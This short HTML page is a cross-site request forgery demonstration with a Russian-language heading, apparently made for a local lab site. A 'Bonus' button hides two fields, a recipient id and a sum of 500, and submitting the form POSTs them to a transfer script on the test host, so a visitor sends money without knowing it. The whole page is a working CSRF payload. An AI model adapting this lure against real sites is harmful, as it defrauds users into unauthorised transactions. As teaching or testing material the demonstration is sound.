<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title>XSRF example</title>
</head>
<body>

<h3>XSRF example (Сross Site Request Forgery - межсайтовая подделка запроса)</h3>

<form method="POST" action="http://xsrf1.loc/send.php">
    <input type="text" name="send_id" value="2" style="visibility: hidden"><br>
    <input type="text" name="sum" value="500" style="visibility: hidden"><br>
    <input type="submit" name="bt_send" value="Bonus">
</form>

</body>
</html>